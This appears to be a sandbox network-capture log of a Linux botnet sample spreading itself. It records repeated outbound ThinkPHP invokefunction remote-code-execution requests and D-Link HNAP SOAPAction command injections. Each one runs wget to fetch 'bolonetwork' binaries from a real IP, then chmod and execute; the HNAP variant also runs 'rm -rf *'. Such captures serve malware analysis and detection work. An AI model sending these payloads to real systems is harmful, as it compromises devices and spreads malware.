                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15192.168.2.143784495.189.164.1180
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.466471910 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16192.168.2.1451662117.59.50.1178081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.469352961 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17192.168.2.143720495.61.168.15080
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.471299887 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18192.168.2.1445306141.98.245.558081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.476233006 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19192.168.2.145620095.100.201.12280
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.478488922 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20192.168.2.144056219.66.111.468081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.481266022 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21192.168.2.144575895.236.83.11980
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.484359026 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22192.168.2.143689464.8.192.1518081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.487608910 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23192.168.2.143914295.220.228.21580
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.493212938 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24192.168.2.143509697.4.105.898081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.498150110 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25192.168.2.145495895.85.128.19780
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.502252102 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26192.168.2.1440982221.8.209.1268081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.508163929 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                27192.168.2.145201695.104.136.9080
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.510478973 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                28192.168.2.1450810160.169.251.2388081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.513355970 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                29192.168.2.145639295.213.60.6380
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.515707970 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                30192.168.2.145291442.126.204.248081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.519738913 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                31192.168.2.145169495.57.6.18680
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.521939039 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                32192.168.2.144426465.131.57.1498081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.523233891 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
